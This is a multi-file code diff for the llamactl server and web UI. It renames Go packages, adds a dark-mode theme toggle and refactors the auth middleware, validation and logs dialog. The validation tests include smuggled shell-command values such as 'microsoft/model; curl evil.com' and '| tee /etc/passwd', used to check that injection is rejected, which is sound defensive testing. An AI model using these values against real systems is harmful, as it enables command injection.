r.ContentLength = int64(len(bodyBytes))

View File

@@ -1,10 +1,11 @@
package llamactl
package server
import (
"crypto/rand"
"crypto/subtle"
"encoding/hex"
"fmt"
"llamactl/pkg/config"
"log"
"net/http"
"os"
@@ -26,7 +27,7 @@ type APIAuthMiddleware struct {
}
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
var generated bool = false
@@ -35,25 +36,25 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
if config.RequireManagementAuth && len(config.ManagementKeys) == 0 {
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
key := generateAPIKey(KeyTypeManagement)
managementAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
}
for _, key := range config.ManagementKeys {
for _, key := range authCfg.ManagementKeys {
managementAPIKeys[key] = true
}
if config.RequireInferenceAuth && len(config.InferenceKeys) == 0 {
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
key := generateAPIKey(KeyTypeInference)
inferenceAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
}
for _, key := range config.InferenceKeys {
for _, key := range authCfg.InferenceKeys {
inferenceAPIKeys[key] = true
}
@@ -66,9 +67,9 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
}
return &APIAuthMiddleware{
requireInferenceAuth: config.RequireInferenceAuth,
requireInferenceAuth: authCfg.RequireInferenceAuth,
inferenceKeys: inferenceAPIKeys,
requireManagementAuth: config.RequireManagementAuth,
requireManagementAuth: authCfg.RequireManagementAuth,
managementKeys: managementAPIKeys,
}
}

View File

@@ -1,18 +1,18 @@
package llamactl_test
package server_test
import (
"llamactl/pkg/config"
"llamactl/pkg/server"
"net/http"
"net/http/httptest"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestAuthMiddleware(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
inferenceKeys []string
managementKeys []string
requestKey string
@@ -22,7 +22,7 @@ func TestAuthMiddleware(t *testing.T) {
// Valid key tests
{
name: "valid inference key for inference",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-valid123",
method: "GET",
@@ -30,7 +30,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for inference", // Management keys work for inference
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -38,7 +38,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for management",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -48,7 +48,7 @@ func TestAuthMiddleware(t *testing.T) {
// Invalid key tests
{
name: "inference key for management should fail",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
inferenceKeys: []string{"sk-inference-user123"},
requestKey: "sk-inference-user123",
method: "GET",
@@ -56,7 +56,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-invalid",
method: "GET",
@@ -64,7 +64,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "GET",
@@ -72,7 +72,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "sk-management-invalid",
method: "GET",
@@ -80,7 +80,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "GET",
@@ -90,7 +90,7 @@ func TestAuthMiddleware(t *testing.T) {
// OPTIONS requests should always pass
{
name: "OPTIONS request bypasses inference auth",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -98,7 +98,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "OPTIONS request bypasses management auth",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -108,7 +108,7 @@ func TestAuthMiddleware(t *testing.T) {
// Cross-key-type validation
{
name: "management key works for inference endpoint",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{},
managementKeys: []string{"sk-management-admin"},
requestKey: "sk-management-admin",
@@ -119,11 +119,11 @@ func TestAuthMiddleware(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
InferenceKeys: tt.inferenceKeys,
ManagementKeys: tt.managementKeys,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Create test request
req := httptest.NewRequest(tt.method, "/test", nil)
@@ -133,12 +133,12 @@ func TestAuthMiddleware(t *testing.T) {
// Create test handler using the appropriate middleware
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -170,17 +170,17 @@ func TestAuthMiddleware(t *testing.T) {
func TestGenerateAPIKey(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
}{
{"inference key generation", llamactl.KeyTypeInference},
{"management key generation", llamactl.KeyTypeManagement},
{"inference key generation", server.KeyTypeInference},
{"management key generation", server.KeyTypeManagement},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test auto-generation by creating config that will trigger it
var config llamactl.AuthConfig
if tt.keyType == llamactl.KeyTypeInference {
var config config.AuthConfig
if tt.keyType == server.KeyTypeInference {
config.RequireInferenceAuth = true
config.InferenceKeys = []string{} // Empty to trigger generation
} else {
@@ -189,19 +189,19 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Create middleware - this should trigger key generation
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(config)
// Test that auth is required (meaning a key was generated)
req := httptest.NewRequest("GET", "/", nil)
recorder := httptest.NewRecorder()
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -214,18 +214,18 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Test uniqueness by creating another middleware instance
middleware2 := llamactl.NewAPIAuthMiddleware(config)
middleware2 := server.NewAPIAuthMiddleware(config)
req2 := httptest.NewRequest("GET", "/", nil)
recorder2 := httptest.NewRecorder()
if tt.keyType == llamactl.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
} else {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
@@ -307,21 +307,21 @@ func TestAutoGeneration(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
RequireInferenceAuth: tt.requireInference,
RequireManagementAuth: tt.requireManagement,
InferenceKeys: tt.providedInference,
ManagementKeys: tt.providedManagement,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Test inference behavior if inference auth is required
if tt.requireInference {
req := httptest.NewRequest("GET", "/v1/models", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
@@ -338,7 +338,7 @@ func TestAutoGeneration(t *testing.T) {
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))

View File

@@ -1,4 +1,4 @@
package llamactl
package server
type OpenAIListInstancesResponse struct {
Object string `json:"object"`

View File

@@ -1,4 +1,4 @@
package llamactl
package server
import (
"fmt"
@@ -8,7 +8,7 @@ import (
"github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/docs"
_ "llamactl/apidocs"
"llamactl/webui"
)
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Add CORS middleware
r.Use(cors.Handler(cors.Options{
AllowedOrigins: handler.config.Server.AllowedOrigins,
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
ExposedHeaders: []string{"Link"},
@@ -27,9 +27,9 @@ func SetupRouter(handler *Handler) *chi.Mux {
}))
// Add API authentication middleware
authMiddleware := NewAPIAuthMiddleware(handler.config.Auth)
authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
if handler.config.Server.EnableSwagger {
if handler.cfg.Server.EnableSwagger {
r.Get("/swagger/*", httpSwagger.Handler(
httpSwagger.URL("/swagger/doc.json"),
))
@@ -38,14 +38,16 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Define routes
r.Route("/api/v1", func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireManagementAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
}
r.Get("/version", handler.VersionHandler()) // Get server version
r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.HelpHandler())
r.Get("/version", handler.VersionHandler())
r.Get("/devices", handler.ListDevicesHandler())
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
})
// Instance management endpoints
@@ -73,7 +75,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Route(("/v1"), func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireInferenceAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
}

10
pkg/testutil/helpers.go Normal file
View File

@@ -0,0 +1,10 @@
package testutil
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
}
func IntPtr(i int) *int {
return &i
}

View File

@@ -1,7 +1,8 @@
package llamactl
package validation
import (
"fmt"
"llamactl/pkg/instance"
"reflect"
"regexp"
)
@@ -33,7 +34,7 @@ func validateStringForInjection(value string) error {
}
// ValidateInstanceOptions performs minimal security validation
func ValidateInstanceOptions(options *CreateInstanceOptions) error {
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
@@ -101,16 +102,16 @@ func validateStructStrings(v any, fieldPath string) error {
return nil
}
func ValidateInstanceName(name string) error {
func ValidateInstanceName(name string) (string, error) {
// Validate instance name
if name == "" {
return ValidationError(fmt.Errorf("name cannot be empty"))
return "", ValidationError(fmt.Errorf("name cannot be empty"))
}
if !validNamePattern.MatchString(name) {
return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
}
if len(name) > 50 {
return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
}
return nil
return name, nil
}

View File

@@ -1,10 +1,12 @@
package llamactl_test
package validation_test
import (
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"llamactl/pkg/validation"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestValidateInstanceName(t *testing.T) {
@@ -39,16 +41,23 @@ func TestValidateInstanceName(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceName(tt.input)
name, err := validation.ValidateInstanceName(tt.input)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
}
if tt.wantErr {
return // Skip further checks if we expect an error
}
// If no error, check that the name is returned as expected
if name != tt.input {
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
}
})
}
}
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
err := llamactl.ValidateInstanceOptions(nil)
err := validation.ValidateInstanceOptions(nil)
if err == nil {
t.Error("Expected error for nil options")
}
@@ -73,13 +82,13 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
}
@@ -126,13 +135,13 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
}
@@ -163,13 +172,13 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
}
@@ -181,13 +190,13 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
// Test that injection in any field is caught
tests := []struct {
name string
options *llamactl.CreateInstanceOptions
options *instance.CreateInstanceOptions
wantErr bool
}{
{
name: "injection in model field",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -196,8 +205,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "injection in log file",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -206,8 +215,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "all safe fields",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -221,7 +230,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceOptions(tt.options)
err := validation.ValidateInstanceOptions(tt.options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
}
@@ -231,11 +240,11 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
// Test that non-string fields don't interfere with validation
options := &llamactl.CreateInstanceOptions{
AutoRestart: boolPtr(true),
MaxRestarts: intPtr(5),
RestartDelay: intPtr(10),
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,
@@ -247,17 +256,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if err != nil {
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
}
}
// Helper functions for pointer fields
func boolPtr(b bool) *bool {
return &b
}
func intPtr(i int) *int {
return &i
}

View File

@@ -7,6 +7,7 @@ import SystemInfoDialog from "./components/SystemInfoDialog";
import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext";
import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -42,44 +43,50 @@ function App() {
// Show loading spinner while checking auth
if (authLoading) {
return (
<div className="min-h-screen bg-gray-50 flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading...</p>
<ThemeProvider>
<div className="min-h-screen bg-background flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading...</p>
</div>
</div>
</div>
</ThemeProvider>
);
}
// Show login dialog if not authenticated
if (!isAuthenticated) {
return (
<div className="min-h-screen bg-gray-50">
<LoginDialog open={true} />
</div>
<ThemeProvider>
<div className="min-h-screen bg-background">
<LoginDialog open={true} />
</div>
</ThemeProvider>
);
}
// Show main app if authenticated
return (
<div className="min-h-screen bg-gray-50">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<ThemeProvider>
<div className="min-h-screen bg-background">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
</div>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
</div>
</ThemeProvider>
);
}

View File

@@ -55,6 +55,21 @@ describe('App Component - Critical Business Logic Only', () => {
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
// Mock window.matchMedia for dark mode functionality
Object.defineProperty(window, 'matchMedia', {
writable: true,
value: vi.fn().mockImplementation((query: string) => ({
matches: false,
media: query,
onchange: null,
addListener: vi.fn(),
removeListener: vi.fn(),
addEventListener: vi.fn(),
removeEventListener: vi.fn(),
dispatchEvent: vi.fn(),
})),
})
})
afterEach(() => {

View File

@@ -1,6 +1,7 @@
import { Button } from "@/components/ui/button";
import { HelpCircle, LogOut } from "lucide-react";
import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext";
import { useTheme } from "@/contexts/ThemeContext";
interface HeaderProps {
onCreateInstance: () => void;
@@ -9,6 +10,7 @@ interface HeaderProps {
function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
const { logout } = useAuth();
const { theme, toggleTheme } = useTheme();
const handleLogout = () => {
if (confirm("Are you sure you want to logout?")) {
@@ -17,10 +19,10 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
};
return (
<header className="bg-white border-b border-gray-200">
<header className="bg-card border-b border-border">
<div className="container mx-auto max-w-4xl px-4 py-4">
<div className="flex items-center justify-between">
<h1 className="text-2xl font-bold text-gray-900">
<h1 className="text-2xl font-bold text-foreground">
Llamactl Dashboard
</h1>
@@ -29,6 +31,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
Create Instance
</Button>
<Button
variant="outline"
size="icon"
onClick={toggleTheme}
data-testid="theme-toggle-button"
title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
>
{theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
</Button>
<Button
variant="outline"
size="icon"

View File

@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
return (
<div className="flex items-center justify-center py-12" aria-label="Loading">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading instances...</p>
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading instances...</p>
</div>
</div>
)
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (error) {
return (
<div className="text-center py-12">
<div className="text-red-600 mb-4">
<div className="text-destructive mb-4">
<p className="text-lg font-semibold">Error loading instances</p>
<p className="text-sm">{error}</p>
</div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (instances.length === 0) {
return (
<div className="text-center py-12">
<p className="text-gray-600 text-lg mb-2">No instances found</p>
<p className="text-gray-500 text-sm">Create your first instance to get started</p>
<p className="text-foreground text-lg mb-2">No instances found</p>
<p className="text-muted-foreground text-sm">Create your first instance to get started</p>
</div>
)
}
return (
<div className="space-y-4">
<h2 className="text-xl font-semibold text-gray-900 mb-6">
<h2 className="text-xl font-semibold text-foreground mb-6">
Instances ({instances.length})
</h2>

View File

@@ -11,6 +11,7 @@ import {
DialogTitle,
} from '@/components/ui/dialog'
import { Badge } from '@/components/ui/badge'
import { instancesApi } from '@/lib/api'
import {
RefreshCw,
Download,
@@ -46,48 +47,44 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
const refreshIntervalRef = useRef<NodeJS.Timeout | null>(null)
// Fetch logs function
const fetchLogs = async (lines?: number) => {
if (!instanceName) return
const fetchLogs = React.useCallback(
async (lines?: number) => {
if (!instanceName) return
setLoading(true)
setError(null)
setLoading(true)
setError(null)
try {
const params = lines ? `?lines=${lines}` : ''
const response = await fetch(`/api/v1/instances/${instanceName}/logs${params}`)
try {
const logText = await instancesApi.getLogs(instanceName, lines)
setLogs(logText)
if (!response.ok) {
throw new Error(`Failed to fetch logs: ${response.status}`)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
const logText = await response.text()
setLogs(logText)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
}
},
[instanceName]
)
// Initial load when dialog opens
useEffect(() => {
if (open && instanceName) {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}
}, [open, instanceName])
}, [open, instanceName, fetchLogs, lineCount])
// Auto-refresh effect
useEffect(() => {
if (autoRefresh && isRunning && open) {
refreshIntervalRef.current = setInterval(() => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}, 2000) // Refresh every 2 seconds
} else {
if (refreshIntervalRef.current) {
@@ -101,7 +98,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
clearInterval(refreshIntervalRef.current)
}
}
}, [autoRefresh, isRunning, open, lineCount])
}, [autoRefresh, isRunning, open, lineCount, fetchLogs])
// Copy logs to clipboard
const copyLogs = async () => {
@@ -135,7 +132,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
// Apply new line count
const applyLineCount = () => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
setShowSettings(false)
}
@@ -198,7 +195,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<Button
variant="outline"
size="sm"
onClick={() => fetchLogs(lineCount)}
onClick={() => void fetchLogs(lineCount)}
disabled={loading}
>
{loading ? (
@@ -290,7 +287,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<div className="flex items-center gap-2 w-full">
<Button
variant="outline"
onClick={copyLogs}
onClick={() => void copyLogs()}
disabled={!logs}
>
{copied ? (

View File

@@ -19,6 +19,15 @@ import {
} from 'lucide-react'
import { serverApi } from '@/lib/api'
// Helper to get version from environment
const getAppVersion = (): string => {
try {
return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
} catch {
return 'unknown'
}
}
interface SystemInfoModalProps {
open: boolean
onOpenChange: (open: boolean) => void
@@ -109,9 +118,20 @@ const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
</div>
) : systemInfo ? (
<div className="space-y-6">
{/* Version Section */}
{/* Llamactl Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Version</h3>
<h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Llama Server Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Llama Server Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">

View File

@@ -7,8 +7,8 @@ import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
fieldKey: keyof CreateInstanceOptions
value: any
onChange: (key: keyof CreateInstanceOptions, value: any) => void
value: string | number | boolean | string[] | undefined
onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
}
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
@@ -18,7 +18,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
// Get type from Zod schema
